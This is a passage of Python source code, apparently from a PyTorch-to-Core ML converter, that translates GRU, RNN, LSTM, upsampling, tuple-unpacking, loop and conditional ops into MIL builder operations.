y=nt)\n h_2 = mb.mul(x=zt, y=h_prev)\n h = mb.add(x=h_1, y=h_2)\n\n # update counter\n counter = mb.add(x=i, y=1)\n\n # update h and h_list\n h = mb.expand_dims(x=h, axes=[0])\n h_list = mb.scatter(data=h_list, indices=counter, updates=h)\n\n return (\n counter,\n h_list,\n )\n\n _, h_list = mb.while_loop(\n _cond=cond, _body=body, loop_vars=([0], h_list),\n )\n\n # slice h0 out of h_list\n h_list = mb.slice_by_index(\n x=h_list,\n begin=[1, 0, 0],\n end=[0, 0, 0],\n begin_mask=[False, True, True],\n end_mask=[True, True, True],\n name=h_list_name,\n )\n\n # get the last state of h_list\n if seq_len.val is None or seq_len.val > 1:\n h = mb.slice_by_index(\n x=h_list,\n begin=[-1, 0, 0],\n end=[-2, 0, 0],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n stride=[-1, 1, 1],\n name=h_name,\n )\n else:\n h = h_list\n\n return h_list, h\n\n\n@register_torch_op\ndef gru(context, node):\n inputs = _get_inputs(context, node, expected=9)\n\n _input = inputs[0]\n h0 = inputs[1]\n weights_list = inputs[2]\n has_bias = inputs[3].val\n num_layers = inputs[4].val\n dropout = inputs[5]\n bidirectional = inputs[7].val\n batch_first = inputs[8].val\n\n # For each layer of GRU, the layout of the weights list is [Wi, Wh, bi, bh] with has_bias == True,\n # and is [Wi, Wh] with bias == False.\n # If bidirectional == True, the list is double up, corresponding to forward and backward direction.\n expected_num_weights = 2 * num_layers * (int(has_bias) + 1) * (int(bidirectional) + 1)\n if len(weights_list) != expected_num_weights:\n raise ValueError(\n \"Incorrect weights shape for gru layer: Expected: {}. Received {}\".format(\n expected_num_weights, len(weights_list)\n )\n )\n\n # Transpose the input data to (seq_len, batch_size, input_dim) if batch_first == True\n if batch_first:\n _input = mb.transpose(x=_input, perm=[1, 0, 2])\n\n # iterate through all the layers\n x = _input\n state_out_list = []\n\n def _get_weights_and_bias(weights_list, index, num_layers, has_bias, bidirectional, mode):\n num_weights_per_layer = len(weights_list) // num_layers\n weights = weights_list[\n num_weights_per_layer * index : num_weights_per_layer * (index + 1)\n ]\n\n if bidirectional:\n weights_f, weights_r = (\n weights[: num_weights_per_layer // 2],\n weights[num_weights_per_layer // 2 :],\n )\n assert len(weights_f) == len(weights_r)\n else:\n weights_f, weights_r = weights, []\n\n if mode == \"forward\":\n weights = weights_f\n elif mode == \"reverse\":\n weights = weights_r\n\n wi, wh = weights[0].val, weights[1].val\n\n if has_bias:\n bi, bh = weights[2].val, weights[3].val\n else:\n hidden_dim = wh.shape[1]\n bi, bh = _np.zeros(3 * hidden_dim), _np.zeros(3 * hidden_dim)\n\n return wi, wh, bi, bh\n\n def _get_initial_state(h0, i, bidirectional, mode):\n\n if mode == \"forward\":\n return mb.slice_by_index(\n x=h0,\n begin=[(1 + int(bidirectional)) * i, 0, 0],\n end=[(1 + int(bidirectional)) * i + 1, 0, 0],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n )\n if mode == \"reverse\":\n assert bidirectional\n return mb.slice_by_index(\n x=h0,\n begin=[2 * i + 1, 0, 0],\n end=[2 * (i + 1), 0, 0],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n )\n\n seq_output_name = node.outputs[0] # output sequence name\n state_output_name = node.outputs[1] # output state name\n\n for i in range(num_layers):\n # get layer names\n x_name = seq_output_name + \"_layer_\" + str(i) if i < num_layers - 1 else seq_output_name\n h_name = state_output_name + '_layer_' + str(i) if num_layers > 0 else state_output_name\n\n if batch_first:\n x_name += \"_tmp\"\n\n if bidirectional:\n x_f_name = x_name + '_forward'\n h_f_name = h_name + '_forward'\n x_r_name = x_name + '_backward'\n h_r_name = h_name + '_backward'\n else:\n x_f_name = x_name\n h_f_name = h_name\n\n # forward direction\n x_f = x\n wi_f, wh_f, bi_f, bh_f = _get_weights_and_bias(\n weights_list, i, num_layers, has_bias, bidirectional, \"forward\"\n )\n initial_h_f = _get_initial_state(h0, i, bidirectional, \"forward\")\n x_f, h_f = _add_gru_layer(x_f, initial_h_f, wi_f, wh_f, bi_f, bh_f, x_f_name, h_f_name)\n\n # reverse direction\n if bidirectional:\n x_r = mb.reverse(x=x, axes=[0])\n wi_r, wh_r, bi_r, bh_r = _get_weights_and_bias(\n weights_list, i, num_layers, has_bias, bidirectional, \"reverse\"\n )\n initial_h_r = _get_initial_state(h0, i, bidirectional, \"reverse\")\n x_r, h_r = _add_gru_layer(\n x_r,\n initial_h_r,\n wi_r,\n wh_r,\n bi_r,\n bh_r,\n x_r_name + \"_reverse\",\n h_r_name,\n )\n x_r = mb.reverse(x=x_r, axes=[0], name=x_r_name)\n\n # concate output from forward and reverse direction\n x = mb.concat(values=[x_f, x_r], axis=2, name=x_name)\n h = mb.concat(values=[h_f, h_r], axis=0, name=h_name)\n else:\n x = x_f\n h = h_f\n\n state_out_list.append(h)\n\n # rnn output\n if batch_first:\n x = mb.transpose(x=x, perm=[1, 0, 2], name=seq_output_name)\n context.add(x, seq_output_name)\n\n # state output\n if len(state_out_list) > 1:\n h = mb.concat(values=state_out_list, axis=0, name=state_output_name)\n context.add(h, state_output_name)\n\n\ndef _add_simple_rnn(context, node, activation):\n inputs = _get_inputs(context, node, expected=9)\n\n '''\n Batch size: B\n Sequence length: S\n Input dimension: C\n Hidden dimension: H\n\n (1) _input : (B, S, C) if batch_first == True, else (S, B, C)\n (2) h0: (num_layers, B, H)\n '''\n _input = inputs[0]\n h0 = inputs[1]\n weights_list = inputs[2]\n has_bias = inputs[3].val\n num_layers = inputs[4].val\n dropout = inputs[5]\n bidirectional = inputs[7].val\n batch_first = inputs[8].val\n\n # We only support uni-directional simple RNN now\n if bidirectional:\n raise NotImplementedError(\"Bidirectional simple RNN not supported.\")\n\n expected_num_weights = 2 * num_layers * (int(has_bias) + 1)\n if len(weights_list) != expected_num_weights:\n raise ValueError(\n \"Incorrect weights shape for lstm layer: Expected: {}. Received {}\".format(\n expected_num_weights, len(weights_list)\n )\n )\n\n # Transpose the input data to (S, B, C) if batch_first == True\n if batch_first:\n _input = mb.transpose(x=_input, perm=[1, 0, 2])\n\n state_out_list = []\n out = _input\n\n for i in range(num_layers):\n if has_bias:\n weight_ih = weights_list[4 * i]\n weight_hh = weights_list[4 * i + 1]\n bias = mb.add(x=weights_list[4 * i + 2], y=weights_list[4 * i + 3])\n else:\n weight_ih = weights_list[2 * i]\n weight_hh = weights_list[2 * i + 1]\n bias = None\n\n # get the initial state\n initial_h = mb.slice_by_index(\n x=h0,\n begin=[i, 0, 0],\n end=[0, 0, 0],\n stride=[1, 1, 1],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n squeeze_mask=[True, False, False],\n )\n\n # get the RNN output for each unit\n out, state = mb.rnn(\n x=out,\n initial_h=initial_h,\n weight_ih=weight_ih,\n weight_hh=weight_hh,\n bias=bias,\n output_sequence=True,\n activation=activation,\n )\n\n # append state to lists which will stack later\n state_out_list.append(state)\n\n # rnn output\n output_name = node.outputs[0]\n if batch_first:\n out = mb.transpose(x=out, perm=[1, 0, 2], name=output_name)\n else:\n out = mb.identity(x=out, name=output_name)\n context.add(out, output_name)\n\n # stack the states into a single tensor\n state_output_name = node.outputs[1]\n if num_layers == 1:\n state = mb.expand_dims(x=state_out_list[0], axes=[0], name=state_output_name)\n else:\n state = mb.stack(values=state_out_list, axis=0, name=state_output_name)\n context.add(state, state_output_name)\n\n\n@register_torch_op\ndef rnn_tanh(context, node):\n _add_simple_rnn(context, node, \"tanh\")\n\n\n@register_torch_op\ndef rnn_relu(context, node):\n _add_simple_rnn(context, node, \"relu\")\n\n\ndef _add_mil_lstm(input, initial_h, initial_c, weights, has_bias, bidirectional, name):\n \"\"\"\n Most of this code is to transform the tensors into\n a shape acceptable by the Core ML implementation of LSTM.\n\n For weights, biases, per direction, pytorch uses two tensors:\n (ii, if, ig, io) stacked on top of each other for each layer (tensor 1)\n and (hi, hf, hg, ho) stacked on top of each other for each layer (tensor 2).\n That is, (W_ii|W_if|W_ig|W_io), of shape (4*hidden_size, input_size) and\n (W_hi|W_hf|W_hg|W_ho), of shape (4*hidden_size, hidden_size).\n\n\n The Core ML LSTM op expects two tensors, weight and bias. So\n the tensors for weight and bias are separated from pytorch's @weights list (1.).\n For bias tensor, the Core ML LSTM op expects the form ii, if, io, ig and hi, hf, ho, hg,\n requiring the ifzo_to_ifoz function. Further adding input and hidden bias into one (2.).\n Similar to bias, input and hidden weight requires different layout. (3.)\n\n initial_h and initial_c are list of \"num_layers\" tensors, each of shape [n_directions, B, H],\n where n_directions = 1 or 2\n whereas the shapes of the initial states to MIL's LSTM, BiLSTM must be [B, H] and [B, 2*H] respectively.\n This means we need to do the following transformations:\n - if its an LSTM (n_directions=1):\n squeeze the first dimension of initial_h/initial_c , before feeding it to MIL's LSTM\n - if its a BiLSTM (n_directions=2):\n - split the input, shape=(2, B, H), to get (1,B,H) and (1,B,H)\n - concatenate to get (1,B,2*H)\n - squeeze to get (B,2*H)\n \"\"\"\n\n if bidirectional:\n if has_bias:\n # (1.)\n biases = weights[2:4] + weights[6:8]\n weights = weights[0:2] + weights[4:6]\n\n # (2.)\n assert len(biases) == 4\n for index in range(len(biases)):\n biases[index] = _ifzo_to_ifoz(\n biases[index],\n name=\"{}_lstm_bias_reshape_{}\".format(name, index),\n )\n f_b = mb.add(x=biases[0], y=biases[1], )\n r_b = mb.add(x=biases[2], y=biases[3], )\n\n # (3.)\n f_ih_w = _ifzo_to_ifoz(\n weights[0], name=name + \"_lstm_forward_ih_weights_ifoz_to_ifzo\",\n )\n f_hh_w = _ifzo_to_ifoz(\n weights[1], name=name + \"_lstm_forward_hh_weights_ifoz_to_ifzo\",\n )\n r_ih_w = _ifzo_to_ifoz(\n weights[2], name=name + \"_lstm_reverse_ih_weights_ifoz_to_ifzo\",\n )\n r_hh_w = _ifzo_to_ifoz(\n weights[3], name=name + \"_lstm_reverse_hh_weights_ifoz_to_ifzo\",\n )\n\n h = _pytorch_hidden_to_coreml_milops(initial_h, name=name + \"_lstm_h0_reshaped\")\n c = _pytorch_hidden_to_coreml_milops(initial_c, name=name + \"_lstm_c0_reshaped\")\n return mb.lstm(x=input,\n initial_h=h,\n initial_c=c,\n weight_ih=f_ih_w,\n weight_hh=f_hh_w,\n weight_ih_back=r_ih_w,\n weight_hh_back=r_hh_w,\n bias=(f_b if has_bias else None),\n bias_back=(r_b if has_bias else None),\n direction=\"bidirectional\",\n output_sequence=True,\n name=name)\n else:\n if has_bias:\n # (1.)\n biases = weights[len(weights) // 2:]\n weights = weights[: len(weights) // 2]\n # (2.)\n b = mb.add(x=biases[0], y=biases[1], )\n b = _ifzo_to_ifoz(\n b, name=name + \"_lstm_bias_transformed\",\n )\n # (3.)\n f_ih_w = _ifzo_to_ifoz(\n weights[0], name=name + \"_lstm_ih_weights_ifoz_to_ifzo\",\n )\n f_hh_w = _ifzo_to_ifoz(\n weights[1], name=name + \"_lstm_hh_weights_ifoz_to_ifzo\",\n )\n\n h = mb.squeeze(x=initial_h, axes=_np.array([0]), name=name + \"_lstm_h0_squeeze\")\n c = mb.squeeze(x=initial_c, axes=_np.array([0]), name=name + \"_lstm_c0_squeeze\")\n\n return mb.lstm(x=input,\n initial_h=h,\n initial_c=c,\n weight_ih=f_ih_w,\n weight_hh=f_hh_w,\n bias=(b if has_bias else None),\n direction=\"forward\",\n output_sequence=True,\n name=name)\n\n\n@register_torch_op\ndef lstm(context, node):\n inputs = _get_inputs(context, node, expected=9)\n\n _input = inputs[0]\n\n # there are two cases here,\n # (1) the input tensor is a PackedSequence object,\n # in this case, the second input of the lstm layer is the batch_size (MIL Var).\n # (2) the input tensor is a normal tensor,\n # in this case, the second input is an array.\n # As the result, we can use the second input to identify which category the graph is.\n\n has_batch_sizes = not isinstance(inputs[1], Iterable)\n if has_batch_sizes:\n batch_sizes = inputs[1]\n h0, c0 = inputs[2]\n weights_list = inputs[3]\n has_bias = inputs[4].val\n num_layers = inputs[5].val\n dropout = inputs[6]\n bidirectional = inputs[8].val\n # the output of the _pack_padded_sequence is always in the layout of batch first\n batch_first = True\n else:\n h0, c0 = inputs[1]\n weights_list = inputs[2]\n has_bias = inputs[3].val\n num_layers = inputs[4].val\n dropout = inputs[5]\n bidirectional = inputs[7].val\n batch_first = inputs[8].val\n\n '''\n Torch LSTM layer's input shapes:\n\n (1) first input\n (Seq, B, C) : if batch_first = False\n (B, Seq, C) : if batch_first = True\n\n (2) & (3) initialization states\n (num_layers, B, H) : if bidirectional = False\n (num_layers * 2, B, H) : if bidirectional = True\n\n\n For the MIL LSTM layer, these are the input shapes:\n\n (1) first input: (Seq, B, C)\n this means, if batch_first=True, we need to insert a transpose op first\n\n (2) & (3) initialization states\n MIL's LSTM layer does not natively support the \"num_layers\" parameters.\n So, when num_layers > 1, we add multiple MIL LSTM ops in a sequence.\n Each of these LSTM ops will take in initialization states in the following shape:\n (B, H) if bidirectional = False\n (B, 2*H) if bidirectional = True\n '''\n\n if batch_first:\n _input = mb.transpose(x=_input, perm=[1, 0, 2], name=_input.name + \"_batch_first_transpose\")\n\n expected_num_weights = 2 * num_layers * (int(bidirectional) + 1) * (int(has_bias) + 1)\n if len(weights_list) != expected_num_weights:\n raise ValueError(\n \"Incorrect weights shape for lstm layer: Expected: {}. Received {}\".format(\n expected_num_weights, len(weights_list)\n )\n )\n\n # shape of h0 and c0 are (num_layers * n_directions, B, H)\n if num_layers == 1:\n all_initial_h = [h0] # [(n_directions, B, H)]\n all_initial_c = [c0] # [(n_directions, B, H)]\n else:\n all_initial_h = mb.split(\n x=h0, num_splits=num_layers, axis=0\n ) # [(n_directions, B, H)]\n all_initial_c = mb.split(\n x=c0, num_splits=num_layers, axis=0\n ) # [(n_directions, B, H)]\n\n n_weights_per_layer = int(len(weights_list) / num_layers)\n x = _input\n h_out_list = []\n c_out_list = []\n for i in range(num_layers):\n if i < num_layers - 1:\n op_name = node.name + \"_lstm_layer_{}\".format(i)\n else:\n if batch_first:\n op_name = node.name + \"_batch_first\"\n else:\n op_name = node.name\n\n lstm_out = _add_mil_lstm(\n input=x,\n initial_h=all_initial_h[i],\n initial_c=all_initial_c[i],\n weights=weights_list[\n i * n_weights_per_layer : (i + 1) * n_weights_per_layer\n ],\n has_bias=has_bias,\n bidirectional=bidirectional,\n name=op_name,\n )\n # shape of lstm_out[0] == (S,B,H) if bidirectional = True else (S, B, 2*H)\n x = lstm_out[0]\n # shape of lstm_out[1] == (B,H) if bidirectional = False else (B, 2*H)\n h_out_list.append(lstm_out[1])\n # shape of lstm_out[2] == (B,H) if bidirectional = False else (B, 2*H)\n c_out_list.append(lstm_out[2])\n\n '''\n For torch, these are the dimensions of the 3 output tensors:\n (1) output[0] :\n (Seq, B, H) if batch_first = False, bidirectional = False\n (Seq, B, 2*H) if batch_first = False, bidirectional = True\n (B, Seq, H) if batch_first = True, bidirectional = False\n (B, Seq, 2*H) if batch_first = True, bidirectional = True\n\n (2) & (3) these are the state outputs:\n (num_layers, B, H) if bidirectional = False\n (num_layers * 2, B, H) if bidirectional = True\n\n MIL lstm layer's output shapes:\n (1) output[0]:\n (Seq, B, H) if bidirectional = False\n (Seq, B, 2*H) if bidirectional = True\n This means we need a transpose op if batch_first is True\n\n (2) & (3) shapes of the state outputs:\n each MIL LSTM op will produce final state tensors with the following shape:\n (B, H) if bidirectional = False\n (B, 2*H) if bidirectional = True\n\n stack/expand the final state tensors to match the Torch output\n '''\n for index, (name, output) in enumerate(zip(node.outputs, lstm_out)):\n if index > 0:\n # index > 0 ===> its one of the state outputs (h or c)\n if bidirectional:\n if num_layers == 1:\n out1, out2 = mb.split(\n x=output, num_splits=2, axis=1\n ) # each output of shape [B, H] after the split\n final_out = mb.stack(\n values=[out1, out2], axis=0, name=name\n ) # [2, B, H]\n context.add(final_out, name)\n else:\n out_state_tensors_list = (\n h_out_list if index == 1 else c_out_list\n ) # each tensor in the list is of shape (B, 2*H)\n list_of_tensors_to_stack = []\n for i in range(num_layers):\n out1, out2 = mb.split(\n x=out_state_tensors_list[i], num_splits=2, axis=1\n ) # each output of shape [B, H] after the split\n out = mb.stack(values=[out1, out2], axis=0) # [2, B, H]\n list_of_tensors_to_stack.append(out)\n final_out = mb.concat(\n values=list_of_tensors_to_stack, axis=0, name=name\n ) # output of shape (num_layers * 2, B, H)\n context.add(final_out, name)\n else:\n if num_layers == 1:\n unsqueeze = mb.expand_dims(x=output, axes=[0], name=name)\n context.add(unsqueeze, name)\n else:\n out = mb.stack(\n values=h_out_list if index == 1 else c_out_list,\n axis=0,\n name=name,\n )\n context.add(out, name)\n else:\n if batch_first:\n output = mb.transpose(x=output, perm=[1, 0, 2], name=name)\n context.add(output, name)\n\n\ndef _get_scales_from_output_size(output_size, input_shape):\n scales = []\n if output_size is not None:\n # output_size will be either\n # (1) A list of Var, and each Var indicates the output size for that dimension\n # (2) A single Var which indicates the whole output size\n # (3) A numpy array\n\n if isinstance(output_size, list):\n output_size = [x.val for x in output_size]\n if isinstance(output_size, Var):\n output_size = [x for x in output_size.val]\n if isinstance(output_size, _np.ndarray):\n output_size = output_size.tolist()\n\n # output size is computed using the formula floor (scale * input_size) in Core ML (and PyTorch).\n # Thus, when computing the scales from the output size, we add a small positive constant to the output size\n # to make sure that the floor formula results in the correct output size and not 1 unit smaller.\n # For instance, if output size = 5 and input size = 2, then scale will be 2.5, which can get\n # represented as 2.49999 due to float precision issues, and this might resultin an output size of 4\n # instead of 5, without the epsilon correction.\n\n if len(output_size) == 1:\n # 1d upsampling\n Hout = output_size[0]\n Hin = input_shape[-1]\n scales_h = Hout / Hin if Hout % Hin == 0 else (Hout + 1e-4) / Hin\n scales = scales_h\n elif len(output_size) == 2:\n # 2d upsampling\n Hout, Wout = output_size[0], output_size[1]\n Hin, Win = input_shape[-2], input_shape[-1]\n scales_h = Hout / Hin if Hout % Hin == 0 else (Hout + 1e-4) / Hin\n scales_w = Wout / Win if Wout % Win == 0 else (Wout + 1e-4) / Win\n scales = [scales_h, scales_w]\n else:\n msg = \"Only 1d and 2d unsampling are supported.\"\n raise NotImplementedError(msg)\n\n return scales\n\n\ndef _is_float_value(x, threshold=0.001):\n return x - _math.floor(x) > threshold\n\n\n@register_torch_op\ndef upsample_linear1d(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n output_size = inputs[1]\n align_corners = bool(inputs[2].val)\n scale = inputs[3]\n\n scale_factor = None\n\n if scale is not None and scale.val is not None and scale.shape == (1,):\n # Get the scale factor from provided inputs\n # This happens when recompute_scale_factor = False\n scale_factor = scale.val[0]\n\n # Currently, we are not supporting recompute_scale_factor = False, align_corners = False with float output size\n _, _, h = x.shape\n if not is_symbolic(h):\n # For the static input shape, we can compute the output size beforehand, and check if it is a float value\n output_size = h * scale_factor\n is_float = _is_float_value(output_size)\n else:\n # For the dynamic input shape, we check if the scale factor itself is float\n is_float = _is_float_value(scale_factor)\n\n if is_float and not align_corners:\n msg = (\n \"recompute_scale_factor = False, align_corners = False with float output size is \"\n + \"not supported for the upsample op {}\".format(node.name)\n )\n raise NotImplementedError(msg)\n\n elif isinstance(output_size, list):\n # When the input shape is dynamic and recompute_scale_factor = True,\n # we need to trace the graph to find the scale factor.\n x = mb.expand_dims(x=x, axes=[3])\n x = mb.torch_upsample_bilinear(\n x=x,\n output_height=output_size[0],\n output_width=1,\n align_corners=align_corners,\n )\n x = mb.squeeze(x=x, axes=[3], name=node.name)\n context.add(x)\n return\n\n elif output_size.val is not None:\n # Infer the scale factor from the provided output size\n scale_factor = _get_scales_from_output_size(output_size, x.shape)\n\n # Expand the input to a 4d tensor, and use MIL's upsample_bilinear op\n x = mb.expand_dims(x=x, axes=[3])\n x = mb.upsample_bilinear(\n x=x,\n scale_factor_height=scale_factor,\n scale_factor_width=1.,\n align_corners=align_corners,\n )\n x = mb.squeeze(x=x, axes=[3], name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef upsample_bilinear2d(context, node):\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n output_size = inputs[1]\n align_corners = bool(inputs[2].val)\n scale_factors = inputs[3]\n\n scales_h, scales_w = None, None\n\n if (\n scale_factors is not None\n and scale_factors.val is not None\n and scale_factors.rank == 1\n and scale_factors.shape[0] == 2\n ):\n # get scale factors from provided inputs\n # this happens when recompute_scale_factor = False\n scale_factors = scale_factors.val\n scales_h = scale_factors[0]\n scales_w = scale_factors[1]\n\n # currently, we are not supporting recompute_scale_factor = False, align_corners = False with float output size\n _, _, h, w = _input.shape\n if not is_symbolic(h) and not is_symbolic(w):\n # For the static input shape, we can compute the output size beforehand\n output_h = h * scales_h\n output_w = w * scales_w\n is_h_float = _is_float_value(output_h)\n is_w_float = _is_float_value(output_w)\n\n else:\n # For the dynamic input shape, we check if the scale factor itself is float\n is_h_float = _is_float_value(scales_h)\n is_w_float = _is_float_value(scales_w)\n\n if (is_h_float or is_w_float) and not align_corners:\n msg = (\n \"recompute_scale_factor = False, align_corners = False with float output size is \"\n + \"not supported for the upsample op {}\".format(node.name)\n )\n raise NotImplementedError(msg)\n\n elif (\n isinstance(output_size, list)\n and output_size[0].val is None\n and output_size[1].val is None\n ):\n # the input shape is dynamic and recompute_scale_factor = True\n # need to trace the graph to find the scale factor\n # we define a torch front end op mb.torch_upsample_bilinear to resolve the const scaling factor\n torch_upsample_bilinear = mb.torch_upsample_bilinear(\n x=_input,\n output_height=output_size[0],\n output_width=output_size[1],\n align_corners=align_corners,\n name=node.name,\n )\n context.add(torch_upsample_bilinear)\n return\n else:\n # infer scale factors from output sizes\n # This happens when recompute_scale_factor = True or the output_size is specified\n scales = _get_scales_from_output_size(output_size, _input.shape)\n if scales:\n scales_h, scales_w = scales\n\n if scales_h is None or scales_w is None:\n if len(inputs) == 5:\n # For torch==1.5.0, upsample_bilinear2d has 5 inputs.\n scales_h = inputs[3]\n scales_w = inputs[4]\n else:\n raise ValueError(\"Failed to infer scale factors from inputs.\")\n\n upsample_bilinear = mb.upsample_bilinear(\n x=_input,\n scale_factor_height=scales_h,\n scale_factor_width=scales_w,\n align_corners=align_corners,\n name=node.name,\n )\n context.add(upsample_bilinear)\n\n\n@register_torch_op\ndef upsample_nearest1d(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n output_size = inputs[1]\n scale = inputs[2]\n\n scale_factor = None\n\n if scale is not None and scale.val is not None and scale.shape == (1,):\n # Get the scale factor from provided inputs\n # This happens when recompute_scale_factor = False\n scale_factor = scale.val[0]\n\n elif isinstance(output_size, list):\n # When the input shape is dynamic and recompute_scale_factor = True,\n # we need to trace the graph to find the scale factor.\n x = mb.expand_dims(x=x, axes=[3])\n x = mb.torch_upsample_nearest_neighbor(\n x=x,\n output_height=output_size[0],\n output_width=1,\n )\n x = mb.squeeze(x=x, axes=[3], name=node.name)\n context.add(x)\n return\n else:\n # Infer scale factors from output sizes\n scale_factor = _get_scales_from_output_size(output_size, x.shape)\n\n x = mb.expand_dims(x=x, axes=[3])\n x = mb.upsample_nearest_neighbor(\n x=x,\n scale_factor_height=scale_factor,\n scale_factor_width=1.,\n )\n x = mb.squeeze(x=x, axes=[3], name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef upsample_nearest2d(context, node):\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n scales_h, scales_w = None, None\n\n output_size = inputs[1]\n scale_factors = inputs[2]\n\n if (\n scale_factors is not None\n and scale_factors.val is not None\n and scale_factors.rank == 1\n and scale_factors.shape[0] == 2\n ):\n # get scale factors from provided inputs\n scale_factors = scale_factors.val\n scales_h = scale_factors[0]\n scales_w = scale_factors[1]\n elif (\n isinstance(output_size, list)\n and output_size[0].val is None\n and output_size[1].val is None\n ):\n # the input shape is dynamic and recompute_scale_factor = True\n # need to trace the graph to find the scale factor\n # we define a torch front end op mb.torch_upsample_nearest_neighbor to resolve the const scaling factor\n torch_upsample_nearest2d = mb.torch_upsample_nearest_neighbor(\n x=_input,\n output_height=output_size[0],\n output_width=output_size[1],\n name=node.name,\n )\n context.add(torch_upsample_nearest2d)\n return\n else:\n # infer scale factors from output sizes\n scales = _get_scales_from_output_size(output_size, _input.shape)\n if scales:\n scales_h, scales_w = scales\n\n if scales_h is None or scales_w is None:\n if len(inputs) == 5:\n # For torch==1.5.0, upsample_bilinear2d has 5 inputs.\n scales_h = inputs[3]\n scales_w = inputs[4]\n else:\n raise ValueError(\"Failed to infer scale factors from inputs.\")\n\n upsample_nearest2d = mb.upsample_nearest_neighbor(\n x=_input,\n scale_factor_height=scales_h,\n scale_factor_width=scales_w,\n name=node.name,\n )\n context.add(upsample_nearest2d)\n\n\n@register_torch_op(torch_alias=[\"listunpack\"])\ndef tupleunpack(context, node):\n inputs = _get_inputs(context, node, expected=1)\n values = inputs[0]\n\n # Node input could have been turned into constant array in @tupleconstruct\n if not isinstance(values, (tuple, list)):\n if values.val is not None:\n values = values.val\n else:\n # The `values` could be a single Var with symbolic val.\n values = [values]\n\n if len(values) != len(node.outputs):\n raise ValueError(f\"unpack node expected {len(node.outputs)} outputs, got {len(values)}\")\n\n # @value is either a numpy primitive or a Var object\n for value, output in zip(values, node.outputs):\n if not isinstance(value, Var):\n value = _construct_constant(value, name=output)\n assert isinstance(value, Var)\n context.add(value, output)\n\n\n@register_torch_op\ndef loop(context, node):\n \"\"\" In TorchIR, a loop looks like:\n %y_1, ..., %y_r = prim::Loop(%max_trip_count, %initial_condition, %x_1, ..., %x_r)\n block0(%i, %a_1, ..., %a_r):\n %b_1, ..., %b_m = some::node(%a_value_from_outer_block, %a_1)\n %iter_condition = some::other_node(%a_2)\n -> (%iter_condition, %b_1, ..., %b_r)\n\n This translates to pseudo code as:\n y_1, ..., y_r = x_1, ..., x_r\n condition = initial_condition\n i = 0\n while condition and i < max_trip_count:\n a_1, ..., a_r = y_1, ..., y_r\n\n ############################################################\n # Actual body of the loop\n b_1, ..., b_m = some::node(a_value_from_outside_of_the_loop, a_1)\n iter_condition = some::node(a_2)\n ############################################################\n\n y_1, ..., y_r = b_1, ..., b_r\n condition = iter_condition\n i += 1\n\n Which further translates to MIL while_loop as:\n loop_vars = (0, initial_condition, x_1, ..., x_r)\n _cond = {\n return (loop_vars[1] and loop_vars[0] < max_trip_count)\n }\n _body = {\n a_1, ..., a_r = loop_vars[2], ..., loop_vars[-1]\n b_1, ..., b_m = some::node(a_value_from_outside_of_the_loop, a_1)\n iter_condition = some::node(a_2)\n return (loop_vars[0] + 1, iter_condition, b_1, ..., b_r)\n }\n\n For loops pass True for %initial_condition and %iter_condition\n While loops set %max_trip_count to INT_MAX and %i is unused\n \"\"\"\n name = node.name\n # inputs[0]: max iter count\n # inputs[1]: initial condition\n # inputs[2]: block input 0\n # ...\n # inputs[N+2]: block input N\n inputs = _get_inputs(context, node)\n max_iter_count = inputs[0]\n\n # Magic default signals this is a while-only loop, so no iteration count\n # is needed.\n has_iter_count = max_iter_count is not None\n\n # Create an interation count. This will only be used if this is a for loop.\n iter_count = mb.const(val=0, name=node.name + \"_iter\")\n # @loop_vars is tuple(iter_count, cond, inputs...)\n loop_vars = tuple([iter_count] + inputs[1:])\n\n def _loop_cond(*loop_vars):\n cond = loop_vars[1]\n\n # Check the iteration count if we're keeping track.\n if has_iter_count:\n iter_count = loop_vars[0]\n iter_cond = mb.less(\n x=iter_count, y=max_iter_count, name=node.name + \"_cond\"\n )\n return mb.logical_and(x=cond, y=iter_cond)\n else:\n return mb.identity(x=cond)\n\n def _shapes_are_equivalent(shape1, shape2):\n \"\"\" Compares two sets of tensor shapes and returns True if they are\n equivalent. That is, they are the same rank, and each dimension\n is the same or symbolic.\n \"\"\"\n if len(shape1) != len(shape2):\n return False\n\n # Each dimension must have the same integer length, or else be\n # symbolic.\n all_equivalent = [\n s1 == s2 or (isinstance(s1, Symbol) and isinstance(s2, Symbol))\n for s1, s2 in zip(shape1, shape2)\n ]\n return all_equivalent\n\n def _loop_body(*loop_vars):\n block = node.blocks[0]\n iter_var = loop_vars[0]\n inputs = (iter_var,) + loop_vars[2:]\n res = convert_block(context, block, inputs)\n\n for input_var, output_var in zip(loop_vars[2:], res[1:]):\n if not _shapes_are_equivalent(input_var.shape, output_var.shape):\n logger.warning(\n \"detected change in shape of loop variable. this could lead to incorrect inference results!\"\n )\n logger.warning(\n \"{}:{} -> {}:{}\".format(\n input_var.name,\n input_var.shape,\n output_var.name,\n output_var.shape,\n )\n )\n\n # Update the iteration count if we're keeping track.\n if has_iter_count:\n iter_var = mb.add(x=iter_var, y=1, name=iter_var.name + \"_inc\")\n else:\n iter_var = mb.identity(x=iter_var)\n\n # Must return tuple with same length and types as @loop_vars.\n return tuple(\n [\n iter_var,\n ]\n + res\n )\n\n loop = mb.while_loop(\n _cond=_loop_cond, _body=_loop_body, loop_vars=loop_vars, name=name\n )\n\n # Make sure the loop returned the expected number of outputs. Note that the\n # first two loop outputs are the iteration count and condition.\n assert len(loop) - 2 == len(node.outputs)\n for output_name, output_var in zip(node.outputs, loop[2:]):\n context.add(output_var, torch_name=output_name)\n\n\n@register_torch_op(torch_alias=[\"if\"])\ndef _if(context, node):\n \"\"\" In TorchIR, a conditional looks like:\n %y_1, ..., %y_r = prim::If(%condition)\n block0(): # TRUE BRANCH, never takes arguments, has to return r outputs\n %t_1, ..., %t_k = some::node(%a_value_from_outer_block)\n -> (%t_1, ..., %t_r)\n block1(): # FALSE BRANCH, never takes arguments, has to return r outputs\n %f_1, ..., %f_m = some::node(%a_value_from_outer_block)\n -> (%f_1, ..., %f_r)\n\n This translates to pseudo code as:\n if (condition):\n t_1, ..., t_k = some::node(a_value_from_outer_block)\n y_1, ..., y_r = t_1, ..., t_r\n else:\n f_1, ..., f_m = some::node(a_value_from_outer_block)\n y_1, ..., 